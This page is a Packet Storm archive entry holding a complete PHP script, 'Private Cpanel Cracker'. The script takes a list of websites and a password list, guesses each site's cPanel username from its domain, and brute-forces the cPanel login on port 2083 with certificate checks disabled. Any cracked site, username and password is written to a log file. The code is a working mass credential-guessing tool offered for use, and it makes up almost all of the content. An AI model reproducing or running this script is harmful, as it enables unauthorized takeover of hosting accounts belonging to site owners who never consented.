exploit the possibilities

Private Cpanel Cracker

Private Cpanel Cracker
Posted May 23, 2012
Authored by miyachung

This is a php script called Private Cpanel Cracker. It takes in a site list and a word list.

tags | cracker, php
MD5 | aa74ed58f8739816bef57faece954e6a

Private Cpanel Cracker

Change Mirror Download
<?php
set_time_limit(0);

/********************************************************************
* Private Cpanel Cracker
* Coded by Miyachung
* miyachung@hotmail.com
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA
*********************************************************************/

class cracker
{

public $sitelist;
public $passlist;

public function calis()
{
$usernames = $this->make_username();
$sitelist = explode("\n",$this->openfile($this->sitelist));
$passlist = explode("\n",$this->openfile($this->passlist));
$increment = 0;

echo "\n\n[*]Site list -> $this->sitelist\n";
echo "[*]Pass list -> $this->passlist\n";
echo "[*]Total urls -> ".count($sitelist)."\n";
echo "[*]Total pass -> ".count($passlist)."\n";
echo "[*]Cracking started\n\n";

foreach($sitelist as $id => $site)
{
$increment++;
$site = trim($site);
echo "-------------------------------------------------------\n";
echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{
$site = "https://$site";
}
$site= $site.":2083";

if(!$this->pass_site($site))
{
echo "[-]Not cpanel,passing site\n";
echo "-------------------------------------------------------\n\n";
continue;
}

echo "[*]Connected Cpanel [OK]\n";
echo "[*]Username: ".$usernames[$id]."\n";
echo "[*]Loaded ".count($passlist)." passwords\n";
echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
foreach($passlist as $pass)
{
$cracked = false;

$pass=trim($pass);

$result = $this->post($site,$usernames[$id],$pass);

if(preg_match('/security_token/',$result))
{
$cracked = true;
echo "[+]$pass password cracked for $usernames[$id]\n";
echo "-------------------------------------------------------\n\n";
$this->savefile("$site|$usernames[$id]|$pass");
break;
}

}
if(!$cracked){echo "[-]Not found\n";echo "-------------------------------------------------------\n\n";}
}

}

private function make_username()
{
$op = explode("\n",$this->openfile($this->sitelist));
foreach($op as $site)
{

if(eregi('http://',$site)) $site = str_replace("http://","",$site);
if(!eregi('www',$site)) $site = "www.".$site;

$site = explode(".",$site);
$site = str_replace("-","",$site[1]);

$usernames[] = substr($site,0,8);

}
return $usernames;
}

public function lists()
{
echo "[!]Site list: ";
$sitelist = fgets(STDIN);
$sitelist = str_replace("\r\n","",$sitelist);
$sitelist = trim($sitelist);
echo "[!]Pass list: ";
$passlist = fgets(STDIN);
$passlist = str_replace("\r\n","",$passlist);
$passlist = trim($passlist);

return array($sitelist,$passlist);
}

private function post($site,$user,$pass)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
$exec = curl_exec($curl);
return $exec;
}

private function pass_site($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
$exec = curl_exec($curl);
$info = curl_getinfo($curl);

if($info['http_code'] != 0)
{
return true;
}
else
{
return false;
}

}

private function openfile($file)
{
$file = @file_get_contents($file);
if(!$file) exit("WTF File not found ?");
return $file;
}

private function savefile($content)
{
$file = fopen('crackerlog.txt','ab');
fwrite($file,$content."\r\n");
fclose($file);
return $file;
}

}

$class = new cracker();
$lists = $class->lists();

if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? ");

$class->sitelist = $lists[0];
$class->passlist = $lists[1];
$class->calis();


?>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close